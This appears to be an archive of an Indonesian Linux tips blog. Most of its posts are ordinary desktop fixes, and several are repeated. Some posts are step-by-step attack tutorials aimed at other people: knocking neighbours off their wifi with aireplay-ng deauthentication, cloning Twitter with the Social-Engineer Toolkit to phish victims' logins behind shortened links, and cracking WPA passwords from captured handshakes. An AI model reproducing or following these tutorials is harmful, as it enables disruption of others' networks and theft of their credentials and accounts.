Ternyata di Kali Linux terminal nya tidak bisa
real transparan, hanya bisa transparan pada background image. Setelah
saya coba edit edit pada aplikasi dconf editor (aplikasi bawaan kali
linux), terminal kali linux saya berubah menjadi REAL transparan.
Berikut tutorialnya:
application
> system tools > dconf editor > pilih menu org > sub menu
gnome > metacity > centang kompositing manager
Screenshot:
Tampilkan postingan dengan label Linux. Tampilkan semua postingan
Tampilkan postingan dengan label Linux. Tampilkan semua postingan
Sabtu, 06 September 2014
Jumat, 29 Agustus 2014
How to Install Minecraft in Ubuntu 14.04 LTS
Buka terminal dan masukkan perintah di bawah ini:
sudo add-apt-repository ppa:minecraft-installer-peeps/minecraft-installer
sudo apt-get update
sudo apt-get install minecraft-installer
sudo add-apt-repository ppa:minecraft-installer-peeps/minecraft-installer
sudo apt-get update
sudo apt-get install minecraft-installer
Kamis, 28 Agustus 2014
Fix GPG Error in Ubuntu 14.04 LTS
Masukkan perintah dibawah ini di terminal (Ctrl+Alt+T)
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 68980A0EA10B4DE8
NOTE: Kode "68980A0EA10B4DE8" ganti dengan kode error anda.
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 68980A0EA10B4DE8
NOTE: Kode "68980A0EA10B4DE8" ganti dengan kode error anda.
Rabu, 27 Agustus 2014
Menambah Repository Kali Linux di Ubuntu 14.04 (trusty tahr)
Kali Linux adalah distro linux khusus pentesting. Distro linux ini distro khusus pentesting terbaik nomor 1 di dunia setelah berakhirnya Backtrack 5 r3.
Tanpa basa basi, langsung saja ke pokok pembahasannya.
1. Buka terminal (Ctrl + Alt + T) dan ketikkan perintah dibawah ini:
sudo gedit /etc/apt/sources.list
2. Copy tulisan di bawah ini dan paste di dalam sources.list yang dibuka tadi.
deb http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
3. Tulis perintah dibawah di terminal:
sudo wget -q -O - http://kali.indonesianhacker.or.id/archive-key.asc | gpg --import
4. Update repository ubuntu anda menggunakan perintah berikut:
sudo apt-get update
Tanpa basa basi, langsung saja ke pokok pembahasannya.
1. Buka terminal (Ctrl + Alt + T) dan ketikkan perintah dibawah ini:
sudo gedit /etc/apt/sources.list
2. Copy tulisan di bawah ini dan paste di dalam sources.list yang dibuka tadi.
deb http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
3. Tulis perintah dibawah di terminal:
sudo wget -q -O - http://kali.indonesianhacker.or.id/archive-key.asc | gpg --import
4. Update repository ubuntu anda menggunakan perintah berikut:
sudo apt-get update
Selasa, 17 Juni 2014
Menjalankan playonlinux dalam mode root
Buka terminal dan masukan perintah ini:
leafpad /usr/share/playonlinux/lib/sources
Cari dan edit tulisan ini:
if [ "$(id -u)" = "0" ]
then
echo "PlayOnLinux is not supposed to be run as root. Sorry"
exit
fi
Menjadi:
#if [ "$(id -u)" = "0" ]
#then
# echo "PlayOnLinux is not supposed to be run as root. Sorry"
# exit
#fi
Save
Masukkan perintah ini di terminal:
leafpad /usr/share/playonlinux/python/mainwindow.py
Cari dan edit tulisan ini:
#### Root uid check
if(os.popen("id -u").read() == "0\n" or os.popen("id -u").read() == "0"):
wx.MessageBox(_("{0} is not supposed to be run as root. Sorry").format(os.environ["APPLICATION_TITLE"]),_("Error"))
os._exit(0)
Menjadi:
#### Root uid check
#if(os.popen("id -u").read() == "0\n" or os.popen("id -u").read() == "0"):
# wx.MessageBox(_("{0} is not supposed to be run as root. Sorry").format(os.environ["APPLICATION_TITLE"]),_("Error"))
# os._exit(0)
Save
Good luck :)
Minggu, 19 Januari 2014
Error Pada apt-get dan dpkg
Saya mengalami error saat mau melakukan update dan install ..
Pesan errornya seperti ini :
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?
Solusinya begini :
- Buka terminal anda, lalu ketikkan :
sudo rm /var/lib/dpkg/lock
(Anda bisa juga menggunakan ini: killall aptitude && killall apt-get atau killall dpkg && killall frontend )
Setelah berhasil, anda bisa langsung mengetikkan perintah berikut :
dpkg --configure -a (posisi sebagai root)
------------------------------------------------------------
kalau errornya seperti ini :
E: Could not get lock /var/cache/apt/archives/lock - open (11 Resource temporarily unavailable)
E: Unable to lock the download directory
solusinya begini :
sudo rm /var/cache/apt/archives/lock
Pesan errornya seperti ini :
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?
Solusinya begini :
- Buka terminal anda, lalu ketikkan :
sudo rm /var/lib/dpkg/lock
(Anda bisa juga menggunakan ini: killall aptitude && killall apt-get atau killall dpkg && killall frontend )
Setelah berhasil, anda bisa langsung mengetikkan perintah berikut :
dpkg --configure -a (posisi sebagai root)
------------------------------------------------------------
kalau errornya seperti ini :
E: Could not get lock /var/cache/apt/archives/lock - open (11 Resource temporarily unavailable)
E: Unable to lock the download directory
solusinya begini :
sudo rm /var/cache/apt/archives/lock
Minggu, 15 Desember 2013
Mengatasi VLC Player Tidak Bisa di Buka di Backtrack
Beberapa aplikasi memang tidak bisa di jalankan dengan mode root, tetapi backtrack secara default menggunakan mode root. Disini saya akan membahas tentang solusi VLC Player yang tidak bisa dibuka di Backtrack. Langsung saja, begini caranya:
1. Jika belum menginstall VLC Player, silahkan diinstall terlebih dahulu
apt-get install vlc
2. Setelah ter-install, kita setting ulang dengan mengetik hexedit /usr/bin/vlc [enter] lalu tekan tombol "Tab" di keyboard agar pindah ke ELF.
3. Tekan CTRL + S untuk mencari, lalu masukan kata "geteuid" (tanpa tanda petik)
4. Setelah ketemu, ganti dengan "getppid" (tanpa tanda petik), dan Save (ctrl + x , lalu tekan y).
Sabtu, 05 Oktober 2013
Hacking Tools di Linux
Wireshark – Network Traffic Analyzer
Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.
#sudo aptitude install wireshark
Nessus – Remote Network Security Auditor
Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.
#sudo apt-get install nessus
NMAP – The Network Mapper
Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.
#sudo apt-get install nmap
Etherape – Graphical Network Monitor Modeled after Etherman
Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.
#sudo apt-get install etherape
Kismet
Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.
#sudo apt-get install kismet
Chkrootkit – Checks for signs of rootkits on the local system
Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient’s Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
#sudo apt-get install chkrootkit
Rkhunter – Rootkit, backdoor, sniffer and exploit scanner
Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.
Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.
#sudo apt-get install rkhunter
TCPDump – A powerful tool for network monitoring and data acquisition
Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.
#sudo apt-get install tcpdump
SNORT – Flexible Network Intrusion Detection System
Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.
#sudo apt-get install snort
Firestarter – program for managing and observing your firewall
Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.
#sudo apt-get install firestarter
CLAMAV – anti-virus utility for Unix
Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:
- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya
- seluruh format file mail
- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.
#sudo apt-get install clamav
Netcat – TCP/IP swiss army knife
Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.
#sudo apt-get install netcat
John
Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.
Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.
#sudo apt-get install john
Dnsniff – Various tools to sniff network traffic for cleartext insecurities
Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.
Sub-sub tools itu adalah berikuti ini:
* arpspoof – Send out unrequested (and possibly forged) arp replies.
* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
* dsniff – password sniffer for several protocols.
* filesnarf – saves selected files sniffed from NFS traffic.
* macof – flood the local network with random MAC addresses.
* mailsnarf – sniffs mail on the LAN and stores it in mbox format.
* msgsnarf – record selected messages from different Instant Messengers.
* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow – SSH traffic analyser.
* tcpkill – kills specified in-progress TCP connections.
* tcpnice – slow down specified TCP connections via “active” traffic shaping.
* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.
* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
#sudo apt-get install dsniff
Sabtu, 28 September 2013
Membuat Tampilan Fedora Menjadi Seperti Windows 7
Jika ingin seperti itu, berikut tutorialnya :
1. Download dulu softwarenya di sini
2. Extract file yang di download tadi
3. Di sana ada tulisan GUIInstall.sh , tinggal di klik saja (cara mudahnya)
4. Setelah itu akan muncul GUI, nanti tinggal di next saja, lalu pilih tema windows 7 yang teman-teman inginkan.
5. Restart komputer anda, dan lihat hasilnya.
Kamis, 26 September 2013
Cara Mengatur Brightness di Ubuntu
Kali ini saya akan posting "Cara Mengatur Brightness di Ubuntu".
Oke, sekarang saya jelaskan apa saja yang perlu di lakukan supaya bisa mengatur kecerahan pada Ubuntu anda.
1. Pada terminal ketik sudo gedit /etc/default/grub
2. Setelah memasukkan password akan muncul jendela gedit, kita tinggal edit parameter yang tadinya GRUB_CMDLINE_LINUX=”” menjadi GRUB_CMDLINE_LINUX=”acpi_backlight=vendor” kemudian simpan.
3. Ketik lagi pada terminal sudo update-grub
4. Restart komputer, kemudian bisa dilihat hasilnya
Keep testing :-)
Oke, sekarang saya jelaskan apa saja yang perlu di lakukan supaya bisa mengatur kecerahan pada Ubuntu anda.
1. Pada terminal ketik sudo gedit /etc/default/grub
2. Setelah memasukkan password akan muncul jendela gedit, kita tinggal edit parameter yang tadinya GRUB_CMDLINE_LINUX=”” menjadi GRUB_CMDLINE_LINUX=”acpi_backlight=vendor” kemudian simpan.
3. Ketik lagi pada terminal sudo update-grub
4. Restart komputer, kemudian bisa dilihat hasilnya
Keep testing :-)
Senin, 23 September 2013
Cara Menghapus Kernel Linux Lama Pada GRUB (Previous Linux Versions)
Jika Anda terganggu dengan tampilan tersebut, maka kita bisa menghapusnya dari list GRUB. Berikut ini caranya:
1. Buat sebuah file dengan menggunakan Gedit di folder home anda dengan nama terserah. Misal saya beri nama hapus_kernel.sh
gedit hapus_kernel.sh
2. Isikan file tersebut dengan skrip berikut :
#/bin/bash
ls /boot/ | grep vmlinuz | sed 's@vmlinuz-@linux-image-@g' | grep -v `uname -r` > /tmp/kernelList
for I in `cat /tmp/kernelList`
do
apt-get remove $I
done
rm -f /tmp/kernelList
update-grub
3. Simpan dan tutup file tersebut, lalu beri hak akses executable dengan perintah berikut:
chmod +x hapus_kernel.sh
4. Untuk menjalankannya kita tinggal menggunakan perintah berikut:
sudo sh hapus_kernel.sh
Minggu, 22 September 2013
Merubah Tampilan Grub Backtrack 5 R3
- Siapkan gambar yang teman-teman kehendaki untuk background nanti dan harus yang berekstensi .PNG atau .tga
- Copy gambar tersebut ke /usr/share/images/desktop-base
- Buka terminal dan ketik perintah
gedit /etc/grub.d/05_debian_theme
- Cari tulisan WALLPAPER="/usr/share/images/grub/moreblue-orbit-grub.png"
- Ganti moreblue-orbit-grub.png dengan nama gambar yang sebelumnya telah kita copy tadi.
- Saya sarankan kepada teman2 untuk membackup file aslinya.
- Terakhir save seluruh perubahan yang telah kita buat tadi.
- Untuk lansung merasakan/melihat efek perubahannya, buka terminal kembali dan eksekusi perintah
update-grub
Silahkan restart Backtrack nya
reboot
- Copy gambar tersebut ke /usr/share/images/desktop-base
- Buka terminal dan ketik perintah
gedit /etc/grub.d/05_debian_theme
- Cari tulisan WALLPAPER="/usr/share/images/grub/moreblue-orbit-grub.png"
- Ganti moreblue-orbit-grub.png dengan nama gambar yang sebelumnya telah kita copy tadi.
- Saya sarankan kepada teman2 untuk membackup file aslinya.
- Terakhir save seluruh perubahan yang telah kita buat tadi.
- Untuk lansung merasakan/melihat efek perubahannya, buka terminal kembali dan eksekusi perintah
update-grub
Silahkan restart Backtrack nya
reboot
Minggu, 15 September 2013
Pesan Error Ketika Membuka Wicd Network Manager [Backtrack 5]
Ketika saya membuka wicd network manager, saya mendapatkan sebuah pesan error seperti gambar di atas.
Sebenarnya tidak masalah ketika kita tekan ok wicd berjalan seperti biasa namun terkadang kita merasa tidak nyaman jika mendapatkan pesan error.
Berikut langkah mengatasinya:
1. Buka terminal dan ketikan perintah berikut
dpkg-reconfigure wicd
2. Lalu masukan perintah lagi
update-rc.d wicd defaults
Buka kembali wicd nya dan pesan error tersebut sudah tidak ada lagi
Mempercantik Tampilan Terminal Pada Linux

Berikut adalah cara untuk menampilkan nama kita di terminal linux.
Caranya :
1. Install aplikasi figlet terlebih dahulu
sudo apt-get install figlet
2. Setelah itu buka lewat terminal
gedit .bashrc
3. Tambahkan pada bagian akhir
figlet "Nico Pachelbel" ( isi nama anda di dalam tanda kutip )
4. Save.
Hasilnya akan seperti ini
Jumat, 26 Juli 2013
Mengatasi Sound Tidak Keluar Setelah Install Backtrack
Kebanyakan yang baru menginstall backtrack sering kali mengalami masalah pada sound atau audionya. Dan saat membuka saund preferences selalu muncul waiting for sound system respond.
Bagaimana cara mengatasinya? Cukup simple dan mudah.
Bagaimana cara mengatasinya? Cukup simple dan mudah.
Masuk ke system > preferences > startup applications > klik add > pada menu command masukkan /usr/bin/pulseaudio
Sedangkan untuk name dan comment bisa anda isi dengan sound atau terserah anda.
Setelah itu masuk ke terminal
---
---
~# pulseaudio -k
---
---
Jika tidak bisa dan muncul pesan error, coba
---
---
~# pulseaudio -D
---
---
Jika masih belum bisa, restart lah komputer anda.
Jika terjadi masalah yang lain pada backtrack anda, misalnya volumenya sudah di kencengin tetapi suaranya tidak besar. Nah ini berarti ada codec yang belum terinstall secara lengkap. Untuk mengatasinya bisa dengan cara seperti ini.
---
---
~# apt-get install ubuntu-restricted-extras
---
---
Jika sudah mencoba cara yang di atas tetapi masih belum bisa, coba gunakan cara berikut
---
---
~# apt-get install w32codecs
~# apt-get install libdvdcss2
---
---
Rabu, 24 Juli 2013
Memutuskan Jaringan Wifi Orang Lain dengan Backtrack
Saya kesal jika sementara asik online, tiba-tiba lambat. Untung saya pengguna backtrack.
Perhatikan langkah saya dalam memutuskan jaringan wifi orang lain menggunakan Backtrack
1. Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda
wlan0 adalah nama default pada Backtrack.
wlan0 adalah nama default pada Backtrack.
2. Aktifkan mode monitor dengan perintah :
airmon-ng start wlan0
3. Mode monitor aktif. Untuk scanning korban, masukkan perintah :
airodump-ng mon0
airodump-ng mon0
ctrl+C untuk menghentikan scanning. Tentukan target (Ex:70:f1:a1:b2:72:77)
4.Langkah memutuskan jaringan korban, masukkan perintah berikut
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
untuk BSSID
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
untuk BSSID
Contoh : (aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)
Proses berhasil jika tampak seperti dibawah ini
Senin, 22 Juli 2013
Tutorial Hacking Twitter Dengan Backtrack
Kita akan bahas dan belajar tentang hacking twitter (sebenrnya bisa buat semua website) dengan menggunakan fake login dan aplikasi SET (Social Engineering Tools).
Kita bahas step by step :
1. Setting IP eth0 sesuai yang anda inginkan, saya disini menggunakan IP 192.168.1.100
ketik : ifconfig 192.168.1.100
Cek dulu apakah IP eth0 kita sesuai yang kita ketik "192.168.1.100"
ketik : airmon-ng
Lihat baris eth0 apakah terdapat 192.168.1.100. Kalau ada, lanjut ke langkah selanjutnya.
2. Buka SET pada backtrack terdapat pada Application>>Backtrack>>Exploitation Tools>>Social Engineering tools>>Social Engineering Toolkit>>SET
Setelah terbuka, ada option yang tertera dari 1 sampai 7 dan 99. Ikutin langkah ini :
Pilih: 1 (Social-Engineering Attacks) [enter]
Pilih: 2 (WebSite Attack Vector) [enter]
Pilih: 6 (Web Jacking Attack Method) [enter]
Pilih: 2 (Site Cloner) [enter]
Lalu kita diminta memasukan IP, masukan IP yang telah kita buat, 192.168.1.100 [enter]
Lalu kita diminta memasukan website yang ingin kita cloning, http://www.twitter.com [enter]
Persiapan sudah siap. Ingat.. jangan di tutup terminalnya !
Sesudah itu anda buka browser dan masukan url : 192.168.1.100/index2.html
Nb: Selalu tambahkan /index2.html di belakang IP kita pada kotak url di browser
Lalu masukan user/email dan password seperti di bawah ini, dan anda bisa menggunakan goo.gl atau adf.ly sebagai url shorter asli kita
Setelah victim (target) memasukan user dan passwordnya dan login, maka user dan passwordnya akan tertera pada terminal kita tadi
kelemahan menggunakan trick ini :
- Target yang waspada..akan melihat keanehan pada linknya..address seperi itu akan mencurigakan,jadi anda harus men-shorturl link anda.. (192.168.1.100/index2.html),kecuali anda bisa mengubah ip address suatu website dalam komputer target dan target jadi salah menghubungi website,suatu saat akan saya berikan tutorialnya
- Trick ini berbeda dengan trick fake login biasanya,trick ini hanya bisa dilakukan selama terminal anda yang menjalankan SET masih aktif,jika di close atau komputer anda mati user dan passwordnya tidak bisa tertera dalam terminal,dan url/link yg kita buat jadi tidak valid lagi..tapi biasanya mreka para attacker yg membuat fake login dengan meretas website orang dan menginject file php dan file html login facebook pada server dan menyebarkan link tersebut dan setiap orang login akan masuk ke file php yang dibuat sebelumnya dan dapat di baca sewaktu-waktu
Good Luck, Keep Trying :)
Minggu, 21 Juli 2013
Solusi msfconsole & msfupdate yang Tidak Berjalan Setelah Update ke Metasploit 4.5.0 bt0
Salah satu penyebab permasalahan diatas adalah direktori "msf3" tidak ada pada direktori /opt/metasploit . Ada yang menggunakan solusi dengan melakukan copy paste direktori msf3 dari BackTrack yang belum diupdate / diupgrade ke dalam BackTrack yang digunakan. Namun menurut saya, cara tersebut memungkinkan kita menggunakan metasploit dengan versi yang sama dengan metasploit pada BackTrack yang belum diupdate / diupgrade. Sehingga solusi yang saat ini saya gunakan dan up to date adalah dengan menggunakan command "git clone" .
Berikut langkah-langkah nya :
# cd /opt/metasploit
# git clone https://github.com/rapid7/metasploit-framework.git msf3
Setelah selesai, silahkan jalankan kembali msfconsole :
Semoga bermanfaat ^_^
Senin, 15 Juli 2013
Cara Mendapatkan Password WiFi dengan Backtrack 5
Kali ini saya akan berbagi sedikit tentang bagaimana Cara Mendapatkan Password Wifi Menggunakan BackTrack 5
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
Persiapan :
1. Aircrack
2. Dictionary attack
Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover
1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill
2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0
3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt
Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini
Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
Persiapan :
1. Aircrack
2. Dictionary attack
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover
1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill
2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0
3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt
Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini
Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..
Kamis, 11 Juli 2013
Cara Mengatur Brightness di Ubuntu Secara Manual
Masalah yang tidak bisa dirubah setelah menekan tombol FN + Up Arrow dan FN + Down Arrow di Linux. Saya sudah menggunakan berbagai cara untuk mengatasi masalah yang timbul tapi itu semua tidak bisa.Dan sekarang akhirnya bisa juga.
Ok langsung saja
Cara Mengatur Redup dan Kecerahan Layar Laptop Secara Manual :
1. Buka Terminal ~ CTRL+ATL+T
2. Ketik perintah berikut :
~$ sudo setpci -s 00:02.0 F4.B=10
Perintah diatas bermaksud untuk mengatur secara manual ke angka yang tidak terjangkau oleh fungsi fn. Angka "10" diatas ini merupakan angka yang mempengaruhi kecerahan suatu layar laptop di ubuntu. Semakin besar angkanya semakin cerah dan sebaliknya, semakin kecil angkanya semakin redup layarnya.
Ok langsung saja
Cara Mengatur Redup dan Kecerahan Layar Laptop Secara Manual :
1. Buka Terminal ~ CTRL+ATL+T
2. Ketik perintah berikut :
~$ sudo setpci -s 00:02.0 F4.B=10
Perintah diatas bermaksud untuk mengatur secara manual ke angka yang tidak terjangkau oleh fungsi fn. Angka "10" diatas ini merupakan angka yang mempengaruhi kecerahan suatu layar laptop di ubuntu. Semakin besar angkanya semakin cerah dan sebaliknya, semakin kecil angkanya semakin redup layarnya.
Langganan:
Postingan (Atom)